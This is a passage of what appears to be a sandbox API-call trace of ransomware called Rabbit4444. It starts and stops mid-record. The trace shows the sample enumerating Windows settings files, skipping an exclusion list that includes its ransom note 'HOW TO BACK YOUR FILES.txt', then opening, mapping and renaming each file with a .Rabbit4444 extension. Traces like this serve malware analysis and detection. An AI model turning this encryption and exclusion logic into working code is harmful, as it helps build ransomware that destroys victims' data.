"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_video.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_DefaultApps_Video.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_defaultapps_video.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.213] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x258aa5db, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x258aa5db, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", cAlternateFileName="AA3CE9~1.SET")) returned 1 [0057.213] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.213] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.213] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.213] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", lpString2=".") returned 1 [0057.213] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", lpString2="..") returned 1 [0057.213] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", lpString2="windows") returned -1 [0057.213] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.213] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.213] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", lpString2="boot") returned -1 [0057.213] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.213] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.213] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms") returned="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms" [0057.213] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.214] lstrlenW (lpString="AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms") returned 60 [0057.214] lstrlenW (lpString="Rabbit4444") returned 10 [0057.214] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.214] lstrlenW (lpString=".dll") returned 4 [0057.214] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.214] lstrlenW (lpString=".lnk") returned 4 [0057.214] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.214] lstrlenW (lpString=".ini") returned 4 [0057.214] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.214] lstrlenW (lpString=".sys") returned 4 [0057.214] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.214] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_devices_pen_enablepixie.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.214] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.214] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14852506102) returned 1 [0057.214] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1233) returned 1 [0057.214] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0057.214] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0057.214] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0057.216] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0057.217] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.217] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.217] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.217] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.217] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14852798648) returned 1 [0057.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0057.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0057.217] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.217] CloseHandle (hObject=0x298) returned 1 [0057.217] CloseHandle (hObject=0x278) returned 1 [0057.218] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms.Rabbit4444") returned 188 [0057.218] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_devices_pen_enablepixie.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_devices_pen_enablepixie.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.220] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25969198, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x25969198, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", cAlternateFileName="AA6E40~1.SET")) returned 1 [0057.220] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.220] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.220] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.220] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", lpString2=".") returned 1 [0057.220] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", lpString2="..") returned 1 [0057.220] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", lpString2="windows") returned -1 [0057.220] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.220] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.220] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", lpString2="boot") returned -1 [0057.220] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.220] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.221] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms") returned="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms" [0057.221] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.221] lstrlenW (lpString="AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms") returned 61 [0057.221] lstrlenW (lpString="Rabbit4444") returned 10 [0057.221] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.221] lstrlenW (lpString=".dll") returned 4 [0057.221] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.221] lstrlenW (lpString=".lnk") returned 4 [0057.221] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.221] lstrlenW (lpString=".ini") returned 4 [0057.221] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.221] lstrlenW (lpString=".sys") returned 4 [0057.221] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.221] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_devices_pen_enableripple.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.221] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.221] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14853225420) returned 1 [0057.222] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1238) returned 1 [0057.222] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.222] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0057.222] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0057.224] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0057.225] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.225] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.225] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.225] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.225] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14853579382) returned 1 [0057.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0057.225] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.225] CloseHandle (hObject=0x298) returned 1 [0057.225] CloseHandle (hObject=0x278) returned 1 [0057.225] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms.Rabbit4444") returned 189 [0057.225] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_devices_pen_enableripple.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_devices_pen_enableripple.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.227] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26233c93, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x26233c93, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", cAlternateFileName="AA13AF~1.SET")) returned 1 [0057.227] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.227] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.227] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.227] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", lpString2=".") returned 1 [0057.227] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", lpString2="..") returned 1 [0057.227] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", lpString2="windows") returned -1 [0057.227] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.227] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.227] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", lpString2="boot") returned -1 [0057.227] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.227] lstrcmpiW (lpString1="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.227] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms") returned="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms" [0057.227] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.228] lstrlenW (lpString="AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms") returned 62 [0057.228] lstrlenW (lpString="Rabbit4444") returned 10 [0057.228] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.228] lstrlenW (lpString=".dll") returned 4 [0057.228] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.228] lstrlenW (lpString=".lnk") returned 4 [0057.228] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.228] lstrlenW (lpString=".ini") returned 4 [0057.228] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.228] lstrlenW (lpString=".sys") returned 4 [0057.228] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.228] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_devices_pen_sethandedness.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.228] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.228] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14853900175) returned 1 [0057.228] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1243) returned 1 [0057.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0057.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0057.228] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0057.230] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0057.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0057.231] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0057.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.231] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14854198948) returned 1 [0057.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0057.231] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0057.231] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.231] CloseHandle (hObject=0x298) returned 1 [0057.231] CloseHandle (hObject=0x278) returned 1 [0057.232] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms.Rabbit4444") returned 190 [0057.232] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_devices_pen_sethandedness.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_devices_pen_sethandedness.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.232] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2671ea63, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2671ea63, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Device_Add.settingcontent-ms", cAlternateFileName="AA17AC~1.SET")) returned 1 [0057.232] lstrcmpiW (lpString1="AAA_SystemSettings_Device_Add.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.232] lstrcmpiW (lpString1="AAA_SystemSettings_Device_Add.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.232] lstrcmpiW (lpString1="AAA_SystemSettings_Device_Add.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.233] lstrcmpiW (lpString1="AAA_SystemSettings_Device_Add.settingcontent-ms", lpString2=".") returned 1 [0057.233] lstrcmpiW (lpString1="AAA_SystemSettings_Device_Add.settingcontent-ms", lpString2="..") returned 1 [0057.233] lstrcmpiW (lpString1="AAA_SystemSettings_Device_Add.settingcontent-ms", lpString2="windows") returned -1 [0057.233] lstrcmpiW (lpString1="AAA_SystemSettings_Device_Add.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.233] lstrcmpiW (lpString1="AAA_SystemSettings_Device_Add.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.233] lstrcmpiW (lpString1="AAA_SystemSettings_Device_Add.settingcontent-ms", lpString2="boot") returned -1 [0057.233] lstrcmpiW (lpString1="AAA_SystemSettings_Device_Add.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.233] lstrcmpiW (lpString1="AAA_SystemSettings_Device_Add.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.233] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Device_Add.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Device_Add.settingcontent-ms") returned="AAA_SystemSettings_Device_Add.settingcontent-ms" [0057.233] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Device_Add.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.233] lstrlenW (lpString="AAA_SystemSettings_Device_Add.settingcontent-ms") returned 47 [0057.233] lstrlenW (lpString="Rabbit4444") returned 10 [0057.233] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.233] lstrlenW (lpString=".dll") returned 4 [0057.233] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.233] lstrlenW (lpString=".lnk") returned 4 [0057.233] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.233] lstrlenW (lpString=".ini") returned 4 [0057.233] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.233] lstrlenW (lpString=".sys") returned 4 [0057.233] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.233] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Device_Add.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_device_add.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.234] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.234] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14854437127) returned 1 [0057.234] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1185) returned 1 [0057.234] 